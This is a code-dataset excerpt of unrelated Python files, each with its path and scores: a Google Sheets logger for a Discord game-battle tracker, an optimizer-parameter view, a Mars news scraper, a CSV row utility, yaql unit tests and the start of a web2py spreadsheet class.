missing_tag = '閃' if play_miss > 0 else ''
body = {
'values': [
[
today.strftime("%Y/%m/%d %H:%M:%S"), player_nickname, play_tag, damage, boss_tag, missing_tag
]
]
}
play_day_offset = today - _start_date
range_name = f'Day {play_day_offset.days + 1}-Log!A2:F'
_sheet_lock.acquire()
result = append_sheet(range_name, body)
_sheet_lock.release()
checkResult = True
try:
updates = result.get('updates')
updated_range = updates.get('updatedRange')
_undo['undostack'].append([updated_range, body, description])
_undo['redostack'] = []
except Exception as e:
FileLogger.error(f'Fail to get result: {description}\n'+ str(e))
checkResult = False
return checkResult
def undo():
global _undo, _sheet_lock
op = _undo['undostack'][-1]
_undo['undostack'] = _undo['undostack'][0:-1]
(range_name, body, description) = op
empty_body = {
'values': [
[
'', '', '', '', '', ''
]
]
}
_sheet_lock.acquire()
result = write_sheet(range_name, empty_body)
_sheet_lock.release()
try:
updated_range = result.get('updatedRange')
except Exception as e:
FileLogger.error(f'Fail to get undo result: {description}\n'+ str(e))
if updated_range and range_name == updated_range:
_undo['redostack'].append([updated_range, body, description])
return description
else:
FileLogger.error(f'Inconsistent undo result: {description}')
return None
def redo():
global _undo, _sheet_lock
op = _undo['redostack'][-1]
_undo['redostack'] = _undo['redostack'][0:-1]
(range_name, body, description) = op
_sheet_lock.acquire()
result = write_sheet(range_name, body)
_sheet_lock.release()
try:
updated_range = result.get('updatedRange')
except Exception as e:
FileLogger.error(f'Fail to get redo result: {description}\n'+ str(e))
if updated_range and range_name == updated_range:
_undo['undostack'].append([updated_range, body, description])
return description
else:
FileLogger.error(f'Inconsistent redo result: {description}')
return None
# The file sheet.id stores the id of a specific google sheet, and is
# created automatically when the switching happens.
if exists(_sheet_id_path):
with open(_sheet_id_path, 'r') as f:
switch_sheets(f.read()) | utils/google_sheets_utils.py | from pickle import load, dump
from os.path import exists, dirname, join
from threading import Thread, RLock
from datetime import datetime
from utils.log import FileLogger
from utils.timer import get_settlement_time_object
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
_scopes = ['https://www.googleapis.com/auth/spreadsheets']
_creds_path = join(dirname(__file__), 'credentials.json')
_pickle_path = join(dirname(__file__), 'token.pickle')
_sheet_id_path = join(dirname(__file__), 'sheet.id')
_creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if exists(_pickle_path):
with open(_pickle_path, 'rb') as token:
_creds = load(token)
# If there are no (valid) credentials available, let the user log in.
if not _creds or not _creds.valid:
if _creds and _creds.expired and _creds.refresh_token:
_creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(_creds_path, _scopes)
_creds = flow.run_console()
# Save the credentials for the next run
with open(_pickle_path, 'wb') as token:
dump(_creds, token)
_service = build('sheets', 'v4', credentials=_creds)
_spreadsheet_id = ''
_start_date = datetime.now()
_player_list = {}
_undo = {}
_undo['undostack'] = []
_undo['redostack'] = []
_sheet_lock = RLock()
def get_sheets_id():
global _spreadsheet_id
return _spreadsheet_id
def read_sheet(range_name):
try:
sheets = _service.spreadsheets()
result = sheets.values().get(spreadsheetId=_spreadsheet_id, range=range_name).execute()
except Exception as e:
FileLogger.error(f'Fail to read sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result.get('values', [])
def write_sheet(range_name, body, option='RAW'):
try:
sheets = _service.spreadsheets()
result = sheets.values().update(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
except Exception as e:
FileLogger.error(f'Fail to write sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result
def append_sheet(range_name, body, option='RAW'):
try:
sheets = _service.spreadsheets()
result = sheets.values().append(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
except Exception as e:
FileLogger.error(f'Fail to append sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result
def get_start_date():
global _start_date
values = read_sheet('隊員列表!A1:A1')
if not values:
FileLogger.error('No start date found.')
return None
else:
date_tokens = values[0][0].split('/')
settlement_time = get_settlement_time_object()
_start_date = datetime(year=int(date_tokens[0]), month=int(date_tokens[1]), day=int(date_tokens[2])).replace(tzinfo=settlement_time.tzinfo)
return _start_date
def get_player_list():
global _player_list
values = read_sheet('隊員列表!B2:C')
if not values:
FileLogger.error('No player list found.')
return None
else:
_player_list = {}
for row in values:
_player_list[int(row[1])] = row[0]
return _player_list
def switch_sheets(sheet_id):
global _spreadsheet_id
_spreadsheet_id = sheet_id
start_date = get_start_date()
player_list = get_player_list()
with open(_sheet_id_path, 'w') as f:
f.write(_spreadsheet_id)
return _spreadsheet_id, start_date, player_list
def fill_sheet(player_discord_id, description, play_number, boss_tag, damage, play_option, play_miss):
global _undo, _sheet_lock
if player_discord_id not in _player_list:
FileLogger.warn(f'Discord ID: {player_discord_id} not found in sheet')
return False
player_nickname = _player_list[player_discord_id]
today = get_settlement_time_object()
play_tag = f"{play_number}{'B' if play_option == '補' else 'A'}"
missing_tag = '閃' if play_miss > 0 else ''
body = {
'values': [
[
today.strftime("%Y/%m/%d %H:%M:%S"), player_nickname, play_tag, damage, boss_tag, missing_tag
]
]
}
play_day_offset = today - _start_date
range_name = f'Day {play_day_offset.days + 1}-Log!A2:F'
_sheet_lock.acquire()
result = append_sheet(range_name, body)
_sheet_lock.release()
checkResult = True
try:
updates = result.get('updates')
updated_range = updates.get('updatedRange')
_undo['undostack'].append([updated_range, body, description])
_undo['redostack'] = []
except Exception as e:
FileLogger.error(f'Fail to get result: {description}\n'+ str(e))
checkResult = False
return checkResult
def undo():
global _undo, _sheet_lock
op = _undo['undostack'][-1]
_undo['undostack'] = _undo['undostack'][0:-1]
(range_name, body, description) = op
empty_body = {
'values': [
[
'', '', '', '', '', ''
]
]
}
_sheet_lock.acquire()
result = write_sheet(range_name, empty_body)
_sheet_lock.release()
try:
updated_range = result.get('updatedRange')
except Exception as e:
FileLogger.error(f'Fail to get undo result: {description}\n'+ str(e))
if updated_range and range_name == updated_range:
_undo['redostack'].append([updated_range, body, description])
return description
else:
FileLogger.error(f'Inconsistent undo result: {description}')
return None
def redo():
global _undo, _sheet_lock
op = _undo['redostack'][-1]
_undo['redostack'] = _undo['redostack'][0:-1]
(range_name, body, description) = op
_sheet_lock.acquire()
result = write_sheet(range_name, body)
_sheet_lock.release()
try:
updated_range = result.get('updatedRange')
except Exception as e:
FileLogger.error(f'Fail to get redo result: {description}\n'+ str(e))
if updated_range and range_name == updated_range:
_undo['undostack'].append([updated_range, body, description])
return description
else:
FileLogger.error(f'Inconsistent redo result: {description}')
return None
# The file sheet.id stores the id of a specific google sheet, and is
# created automatically when the switching happens.
if exists(_sheet_id_path):
with open(_sheet_id_path, 'r') as f:
switch_sheets(f.read()) | 0.252568 | 0.089415 |
"""A superclass to encapsulate getting optimizer parameters for views."""
import copy
from moe.optimal_learning.python.constant import OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS, ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE
from moe.views.gp_pretty_view import GpPrettyView
from moe.views.schemas.base_schemas import OptimizerInfo, OPTIMIZER_TYPES_TO_SCHEMA_CLASSES
class OptimizableGpPrettyView(GpPrettyView):
"""A superclass to encapsulate getting optimizer parameters for views."""
def _get_default_optimizer_type(self, params):
"""Get the optimizer type associated with this REST endpoint.
:param params: a (partially) deserialized REST request with everything except possibly
``params['optimizer_info']``
:type params: dict
:return: optimizer type to use, one of :const:`moe.optimal_learning.python.constant.OPTIMIZER_TYPES`
:rtype: str
"""
return ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE[self._route_name]
def _get_default_optimizer_params(self, params):
"""Get the default optimizer parameters associated with the desired ``optimizer_type`` and REST endpoint.
:param params: a (partially) deserialized REST request with everything except possibly
``params['optimizer_info']``
:type params: dict
:return: default multistart and optimizer parameters to use with this REST request
:rtype: :class:`moe.optimal_learning.python.constant.DefaultOptimizerInfoTuple`
"""
optimizer_type = params['optimizer_info']['optimizer_type']
optimizer_parameters_lookup = (optimizer_type, self._route_name)
return OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS[optimizer_parameters_lookup]
def get_params_from_request(self):
"""Return the deserialized parameters from the json_body of a request.
We explicitly pull out the ``optimizer_type`` and use it to deserialize and validate
the other parameters (num_multistarts, num_random_samples, optimizer_parameters).
This is necessary because we have different default optimizer parameters for
different combinations of ``optimizer_type``, endpoint, and other features.
See :const:`moe.optimal_learning.python.constants.OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS`
:returns: A deserialized self.request_schema object
:rtype: dict
"""
# First we get the standard params (not including optimizer info)
params = super(OptimizableGpPrettyView, self).get_params_from_request()
# colander deserialized results are READ-ONLY. We will potentially be overwriting
# fields of ``params['optimizer_info']``, so we need to copy it first.
params['optimizer_info'] = copy.deepcopy(params['optimizer_info'])
# Set optimizer_type to default value if the user did not provide a value
if params['optimizer_info']['optimizer_type'] is None:
params['optimizer_info']['optimizer_type'] = self._get_default_optimizer_type(params)
default_optimizer_parameters = self._get_default_optimizer_params(params)
# Set num_multistarts to default value if the user did not provide a value
if params['optimizer_info']['num_multistarts'] is None:
params['optimizer_info']['num_multistarts'] = default_optimizer_parameters.num_multistarts
# Set num_random_samples to default value if the user did not provide a value
if params['optimizer_info']['num_random_samples'] is None:
params['optimizer_info']['num_random_samples'] = default_optimizer_parameters.num_random_samples
# Override the defaults with information that may be in the optimizer parameters
optimizer_parameters_dict = default_optimizer_parameters.optimizer_parameters._asdict()
if params['optimizer_info']['optimizer_parameters']:
for param, val in params['optimizer_info']['optimizer_parameters'].iteritems():
optimizer_parameters_dict[param] = val
# Find the schema class that corresponds to the ``optimizer_type`` of the request
# TODO(GH-303): Until this ticket is complete (see schemas.OptimizerInfo),
# optimizer_parameters has *not been validated yet*, so we need to validate manually.
schema_class = OPTIMIZER_TYPES_TO_SCHEMA_CLASSES[params['optimizer_info']['optimizer_type']]()
# Deserialize and validate the parameters
validated_optimizer_parameters = schema_class.deserialize(optimizer_parameters_dict)
# Put the now validated parameters back into the params dictionary to be consumed by the view
params['optimizer_info']['optimizer_parameters'] = validated_optimizer_parameters
# We may have filled in missing values; re-validate these values with deserialize()
# and write the result into optimizer_info.
params['optimizer_info'] = OptimizerInfo().deserialize(params['optimizer_info'])
return params | moe/views/optimizable_gp_pretty_view.py | """A superclass to encapsulate getting optimizer parameters for views."""
import copy
from moe.optimal_learning.python.constant import OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS, ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE
from moe.views.gp_pretty_view import GpPrettyView
from moe.views.schemas.base_schemas import OptimizerInfo, OPTIMIZER_TYPES_TO_SCHEMA_CLASSES
class OptimizableGpPrettyView(GpPrettyView):
"""A superclass to encapsulate getting optimizer parameters for views."""
def _get_default_optimizer_type(self, params):
"""Get the optimizer type associated with this REST endpoint.
:param params: a (partially) deserialized REST request with everything except possibly
``params['optimizer_info']``
:type params: dict
:return: optimizer type to use, one of :const:`moe.optimal_learning.python.constant.OPTIMIZER_TYPES`
:rtype: str
"""
return ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE[self._route_name]
def _get_default_optimizer_params(self, params):
"""Get the default optimizer parameters associated with the desired ``optimizer_type`` and REST endpoint.
:param params: a (partially) deserialized REST request with everything except possibly
``params['optimizer_info']``
:type params: dict
:return: default multistart and optimizer parameters to use with this REST request
:rtype: :class:`moe.optimal_learning.python.constant.DefaultOptimizerInfoTuple`
"""
optimizer_type = params['optimizer_info']['optimizer_type']
optimizer_parameters_lookup = (optimizer_type, self._route_name)
return OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS[optimizer_parameters_lookup]
def get_params_from_request(self):
"""Return the deserialized parameters from the json_body of a request.
We explicitly pull out the ``optimizer_type`` and use it to deserialize and validate
the other parameters (num_multistarts, num_random_samples, optimizer_parameters).
This is necessary because we have different default optimizer parameters for
different combinations of ``optimizer_type``, endpoint, and other features.
See :const:`moe.optimal_learning.python.constants.OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS`
:returns: A deserialized self.request_schema object
:rtype: dict
"""
# First we get the standard params (not including optimizer info)
params = super(OptimizableGpPrettyView, self).get_params_from_request()
# colander deserialized results are READ-ONLY. We will potentially be overwriting
# fields of ``params['optimizer_info']``, so we need to copy it first.
params['optimizer_info'] = copy.deepcopy(params['optimizer_info'])
# Set optimizer_type to default value if the user did not provide a value
if params['optimizer_info']['optimizer_type'] is None:
params['optimizer_info']['optimizer_type'] = self._get_default_optimizer_type(params)
default_optimizer_parameters = self._get_default_optimizer_params(params)
# Set num_multistarts to default value if the user did not provide a value
if params['optimizer_info']['num_multistarts'] is None:
params['optimizer_info']['num_multistarts'] = default_optimizer_parameters.num_multistarts
# Set num_random_samples to default value if the user did not provide a value
if params['optimizer_info']['num_random_samples'] is None:
params['optimizer_info']['num_random_samples'] = default_optimizer_parameters.num_random_samples
# Override the defaults with information that may be in the optimizer parameters
optimizer_parameters_dict = default_optimizer_parameters.optimizer_parameters._asdict()
if params['optimizer_info']['optimizer_parameters']:
for param, val in params['optimizer_info']['optimizer_parameters'].iteritems():
optimizer_parameters_dict[param] = val
# Find the schema class that corresponds to the ``optimizer_type`` of the request
# TODO(GH-303): Until this ticket is complete (see schemas.OptimizerInfo),
# optimizer_parameters has *not been validated yet*, so we need to validate manually.
schema_class = OPTIMIZER_TYPES_TO_SCHEMA_CLASSES[params['optimizer_info']['optimizer_type']]()
# Deserialize and validate the parameters
validated_optimizer_parameters = schema_class.deserialize(optimizer_parameters_dict)
# Put the now validated parameters back into the params dictionary to be consumed by the view
params['optimizer_info']['optimizer_parameters'] = validated_optimizer_parameters
# We may have filled in missing values; re-validate these values with deserialize()
# and write the result into optimizer_info.
params['optimizer_info'] = OptimizerInfo().deserialize(params['optimizer_info'])
return params | 0.858556 | 0.392162 |
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import os
import pymongo
from flask_pymongo import PyMongo
def init_browser():
executable_path = {"executable_path": "chromedriver"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
#Creating a path to chrome driver.
browser = Browser('chrome', headless=False)
browser.visit('https://mars.nasa.gov/news/')
html = browser.html
nasa_soup = BeautifulSoup(html, 'html.parser')
# Scrape the NASA webpage and collect the latest news, title and paragraph
#text. Assign the text to variables that you can reference later.
title_news = nasa_soup.find('div', class_='content_title').text
parag_news = nasa_soup.find('div', class_='article_teaser_body').text
# JPL MARS SPACE IMAGES - FEATURED IMAGE
#Visiting url for JPL Featured Space Image
browser = Browser('chrome', headless = False)
browser.visit('https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars')
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
imag=soup.find("img", class_="thumb")["src"]
featured_image_url = "https://www.jpl.nasa.gov" + imag
# MARS WEATHER
#Visiting Mars weather twitter webpage
browser = Browser('chrome', headless = False)
browser.visit('https://twitter.com/marswxreport?lang=en')
soup = BeautifulSoup(browser.html, 'html.parser')
mars_tweet = soup.find(class_='tweet-text').text
# MARS FACTS
#Visiting the Mars facts webpage
browser = Browser('chrome', headless = False)
url = "https://space-facts.com/mars/"
browser.visit(url)
mars_facts = pd.read_html(url)
mars_profile = mars_facts[1]
mars_profile.columns = ["Mars Planet Profile", "Features"]
mars_profile.set_index("Mars Planet Profile", inplace=True)
html_table = mars_profile.reset_index().to_html(index=False)
# MARS HEMISPHERES
#Visiting the Mars facts webpage
browser = Browser('chrome', headless=False)
hemis_urls = []
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
CerberusEnhn = browser.find_by_text('Cerberus Hemisphere Enhanced')
Cerb = CerberusEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
SchiaparelliEnhn = browser.find_by_text('Schiaparelli Hemisphere Enhanced')
Schiap = SchiaparelliEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
SyrtisEnhn = browser.find_by_text('Syrtis Major Hemisphere Enhanced')
Syrtis = SyrtisEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
VallesEnhn = browser.find_by_text('Valles Marineris Hemisphere Enhanced')
Valles = VallesEnhn.click()
browser.url
hemis_urls.append(browser.url)
#naming and listing the hemisphere images
browser.visit(hemis_urls[0])
hemisurl_1 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[1])
hemisurl_2 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[2])
hemisurl_3 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[3])
hemisurl_4 = browser.find_by_text('Sample')['href']
#common dictionary including all parsed internet data
common_dictionary = {
"Updated_title": title_news,
"Updated_news": parag_news,
"Featured_image": featured_image_url,
"Weather_update": mars_tweet,
"Facts_Mars": html_table,
"Cerberus_hemisphere": hemisurl_1,
"Schiaparelli_hemisphere": hemisurl_2,
"Syrtis_hemisphere": hemisurl_3,
"Valler_hemisphere": hemisurl_4
}
hemisphere_images = [
{"Title": "Valles Marineris Hemisphere", "img_url": "hemisphere4_image_url"},
{"Title": "Cerberus Hemisphere", "img_url": "hemisphere1_image_url"},
{"Title": "Schiaparelli Hemisphere", "img_url": "hemisphere2_image_url"},
{"Title": "Syrtis Major Hemisphere", "img_url": "hemisphere3_image_url"},
]
browser.quit()
return common_dictionary | Mission_to_Mars/scrape_mars.py | import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import os
import pymongo
from flask_pymongo import PyMongo
def init_browser():
executable_path = {"executable_path": "chromedriver"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
#Creating a path to chrome driver.
browser = Browser('chrome', headless=False)
browser.visit('https://mars.nasa.gov/news/')
html = browser.html
nasa_soup = BeautifulSoup(html, 'html.parser')
# Scrape the NASA webpage and collect the latest news, title and paragraph
#text. Assign the text to variables that you can reference later.
title_news = nasa_soup.find('div', class_='content_title').text
parag_news = nasa_soup.find('div', class_='article_teaser_body').text
# JPL MARS SPACE IMAGES - FEATURED IMAGE
#Visiting url for JPL Featured Space Image
browser = Browser('chrome', headless = False)
browser.visit('https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars')
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
imag=soup.find("img", class_="thumb")["src"]
featured_image_url = "https://www.jpl.nasa.gov" + imag
# MARS WEATHER
#Visiting Mars weather twitter webpage
browser = Browser('chrome', headless = False)
browser.visit('https://twitter.com/marswxreport?lang=en')
soup = BeautifulSoup(browser.html, 'html.parser')
mars_tweet = soup.find(class_='tweet-text').text
# MARS FACTS
#Visiting the Mars facts webpage
browser = Browser('chrome', headless = False)
url = "https://space-facts.com/mars/"
browser.visit(url)
mars_facts = pd.read_html(url)
mars_profile = mars_facts[1]
mars_profile.columns = ["Mars Planet Profile", "Features"]
mars_profile.set_index("Mars Planet Profile", inplace=True)
html_table = mars_profile.reset_index().to_html(index=False)
# MARS HEMISPHERES
#Visiting the Mars facts webpage
browser = Browser('chrome', headless=False)
hemis_urls = []
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
CerberusEnhn = browser.find_by_text('Cerberus Hemisphere Enhanced')
Cerb = CerberusEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
SchiaparelliEnhn = browser.find_by_text('Schiaparelli Hemisphere Enhanced')
Schiap = SchiaparelliEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
SyrtisEnhn = browser.find_by_text('Syrtis Major Hemisphere Enhanced')
Syrtis = SyrtisEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
VallesEnhn = browser.find_by_text('Valles Marineris Hemisphere Enhanced')
Valles = VallesEnhn.click()
browser.url
hemis_urls.append(browser.url)
#naming and listing the hemisphere images
browser.visit(hemis_urls[0])
hemisurl_1 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[1])
hemisurl_2 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[2])
hemisurl_3 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[3])
hemisurl_4 = browser.find_by_text('Sample')['href']
#common dictionary including all parsed internet data
common_dictionary = {
"Updated_title": title_news,
"Updated_news": parag_news,
"Featured_image": featured_image_url,
"Weather_update": mars_tweet,
"Facts_Mars": html_table,
"Cerberus_hemisphere": hemisurl_1,
"Schiaparelli_hemisphere": hemisurl_2,
"Syrtis_hemisphere": hemisurl_3,
"Valler_hemisphere": hemisurl_4
}
hemisphere_images = [
{"Title": "Valles Marineris Hemisphere", "img_url": "hemisphere4_image_url"},
{"Title": "Cerberus Hemisphere", "img_url": "hemisphere1_image_url"},
{"Title": "Schiaparelli Hemisphere", "img_url": "hemisphere2_image_url"},
{"Title": "Syrtis Major Hemisphere", "img_url": "hemisphere3_image_url"},
]
browser.quit()
return common_dictionary | 0.287668 | 0.226591 |
# This code supports CSV (comma-separated values) text files like the csv library,
# but adds set-type operations AddRow() and DeleteRow()
# Each CSV file consists of a series of zero or more lines called rows.
# Each row is a comma-separated list of values.
# ReadToList() returns a list of row-elements, where each row-element is
# itself a list of the values in the corresponding row (line) of the file.
# AddRow() and DeleteRow() each take a row-element as their second argument.
import os, csv
# Read CSV file into a list of lists
def ReadToList(csvPath):
try:
with open(csvPath, 'r') as csvFile:
reader = csv.reader(csvFile)
return list(reader)
except:
print("The CSV could not be read.")
return []
def AddRow(csvPath, rowToAdd):
alreadyExists = False
if os.path.exists(csvPath):
try:
with open(csvPath, 'r') as csvFile:
for row in csv.reader(csvFile):
if row == rowToAdd:
alreadyExists = True
except:
print("The CSV could not be read.")
if not alreadyExists:
with open(csvPath, 'a') as csvFile:
csvFile.write(','.join(rowToAdd) + "\n")
return not alreadyExists
def DeleteRow(csvPath, rowToRemove):
csvList = ReadToList(csvPath)
with open(csvPath, 'w', newline='') as csvOut:
writer = csv.writer(csvOut)
for row in csvList:
if row != rowToRemove:
writer.writerow(row)
def _TestAddRow():
csvList = ReadToList('local.csv')
rowToAdd = csvList[1]
rowToAdd[0] = 'ElBarfo'
if AddRow('local.csv', rowToAdd):
print('line added')
else:
print('line was already present')
csvList = ReadToList('local.csv')
for line in csvList:
print(line)
def _TestDeleteRow():
csvList = ReadToList('local.csv')
rowToRemove = csvList[1]
DeleteRow('local.csv', rowToRemove)
csvList = ReadToList('local.csv')
for line in csvList:
print(line)
if __name__ == "__main__":
_TestDeleteRow() | MyCSV.py |
# This code supports CSV (comma-separated values) text files like the csv library,
# but adds set-type operations AddRow() and DeleteRow()
# Each CSV file consists of a series of zero or more lines called rows.
# Each row is a comma-separated list of values.
# ReadToList() returns a list of row-elements, where each row-element is
# itself a list of the values in the corresponding row (line) of the file.
# AddRow() and DeleteRow() each take a row-element as their second argument.
import os, csv
# Read CSV file into a list of lists
def ReadToList(csvPath):
try:
with open(csvPath, 'r') as csvFile:
reader = csv.reader(csvFile)
return list(reader)
except:
print("The CSV could not be read.")
return []
def AddRow(csvPath, rowToAdd):
alreadyExists = False
if os.path.exists(csvPath):
try:
with open(csvPath, 'r') as csvFile:
for row in csv.reader(csvFile):
if row == rowToAdd:
alreadyExists = True
except:
print("The CSV could not be read.")
if not alreadyExists:
with open(csvPath, 'a') as csvFile:
csvFile.write(','.join(rowToAdd) + "\n")
return not alreadyExists
def DeleteRow(csvPath, rowToRemove):
csvList = ReadToList(csvPath)
with open(csvPath, 'w', newline='') as csvOut:
writer = csv.writer(csvOut)
for row in csvList:
if row != rowToRemove:
writer.writerow(row)
def _TestAddRow():
csvList = ReadToList('local.csv')
rowToAdd = csvList[1]
rowToAdd[0] = 'ElBarfo'
if AddRow('local.csv', rowToAdd):
print('line added')
else:
print('line was already present')
csvList = ReadToList('local.csv')
for line in csvList:
print(line)
def _TestDeleteRow():
csvList = ReadToList('local.csv')
rowToRemove = csvList[1]
DeleteRow('local.csv', rowToRemove)
csvList = ReadToList('local.csv')
for line in csvList:
print(line)
if __name__ == "__main__":
_TestDeleteRow() | 0.631253 | 0.508544 |
from yaql.language import exceptions
from yaql.language import specs
from yaql.language import yaqltypes
import yaql.tests
class TestMiscellaneous(yaql.tests.TestCase):
def test_pass_lambda_from_code(self):
self.assertEqual(
[],
list(self.context('where', self.engine, [1, 2, 3])(False))
)
self.assertEqual(
[2, 3],
list(self.context('where', self.engine, [1, 2, 3])(
lambda t: t > 1))
)
def test_bool_is_not_an_integer(self):
@specs.parameter('arg', yaqltypes.Integer())
def foo(arg):
return arg
self.context.register_function(foo)
self.assertEqual(2, self.eval('foo(2)'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'foo(true)')
def test_nullable_collections(self):
@specs.parameter('arg', yaqltypes.Sequence())
def foo1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Sequence(nullable=True))
def foo2(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterable())
def bar1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterable(nullable=True))
def bar2(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterator())
def baz1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterator(nullable=True))
def baz2(arg):
return arg is None
for func in (foo1, foo2, bar1, bar2, baz1, baz2):
self.context.register_function(func)
self.assertFalse(self.eval('foo1([1, 2])'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'foo1(null)')
self.assertFalse(self.eval('foo2([1, 2])'))
self.assertTrue(self.eval('foo2(null)'))
self.assertFalse(self.eval('bar1([1, 2])'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'bar1(null)')
self.assertFalse(self.eval('bar2([1, 2])'))
self.assertTrue(self.eval('bar2(null)'))
self.assertFalse(self.eval('baz1($)', data=iter([1, 2])))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'baz1(null)')
self.assertFalse(self.eval('baz2($)', data=iter([1, 2])))
self.assertTrue(self.eval('baz2(null)')) | yaql/tests/test_miscellaneous.py |
from yaql.language import exceptions
from yaql.language import specs
from yaql.language import yaqltypes
import yaql.tests
class TestMiscellaneous(yaql.tests.TestCase):
def test_pass_lambda_from_code(self):
self.assertEqual(
[],
list(self.context('where', self.engine, [1, 2, 3])(False))
)
self.assertEqual(
[2, 3],
list(self.context('where', self.engine, [1, 2, 3])(
lambda t: t > 1))
)
def test_bool_is_not_an_integer(self):
@specs.parameter('arg', yaqltypes.Integer())
def foo(arg):
return arg
self.context.register_function(foo)
self.assertEqual(2, self.eval('foo(2)'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'foo(true)')
def test_nullable_collections(self):
@specs.parameter('arg', yaqltypes.Sequence())
def foo1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Sequence(nullable=True))
def foo2(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterable())
def bar1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterable(nullable=True))
def bar2(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterator())
def baz1(arg):
return arg is None
@specs.parameter('arg', yaqltypes.Iterator(nullable=True))
def baz2(arg):
return arg is None
for func in (foo1, foo2, bar1, bar2, baz1, baz2):
self.context.register_function(func)
self.assertFalse(self.eval('foo1([1, 2])'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'foo1(null)')
self.assertFalse(self.eval('foo2([1, 2])'))
self.assertTrue(self.eval('foo2(null)'))
self.assertFalse(self.eval('bar1([1, 2])'))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'bar1(null)')
self.assertFalse(self.eval('bar2([1, 2])'))
self.assertTrue(self.eval('bar2(null)'))
self.assertFalse(self.eval('baz1($)', data=iter([1, 2])))
self.assertRaises(
exceptions.NoMatchingFunctionException,
self.eval, 'baz1(null)')
self.assertFalse(self.eval('baz2($)', data=iter([1, 2])))
self.assertTrue(self.eval('baz2(null)')) | 0.602529 | 0.415314 |
import re
import pickle
import copy
def quote(text):
return str(text).replace('\\','\\\\').replace("'","\\'")
class Node:
"""
Example::
# controller
from gluon.contrib.spreadsheet import Sheet
def index():
if request.args:
sheet = Sheet.loads(session.psheet)
jquery=sheet.process(request)
session.psheet=sheet.dumps()
return jquery
else:
sheet=Sheet(10,10,URL(r=request))
#sheet = Sheet.loads(session.psheet)
sheet.cell('r0c3',value='=r0c0+r0c1+r0c2',readonly=True)
session.psheet = sheet.dumps()
return dict(sheet=sheet)
# view
{{extend 'layout.html'}}
<form>
<table spacing="0" border="0" padding="0">
{{for r in xrange(sheet.rows):}}
<tr>
{{for c in xrange(sheet.cols):}}
<td>
{{=XML(sheet.nodes['r%sc%s'%(r,c)].xml())}}
</td>
{{pass}}
</tr>
{{pass}}
</table>
</form>
"""
def __init__(self,name,value,url='.',readonly=False,active=True,onchange=None):
self.url=url
self.name=name
self.value=value
self.computed_value=''
self.incoming={}
self.outcoming={}
self.readonly=readonly
self.active=active
self.onchange=onchange
self.size=6
self.locked=False
def xml(self):
return """<input name="%s" id="%s" value="%s" size="%s"
onkeyup="ajax('%s/keyup',['%s'],':eval');"
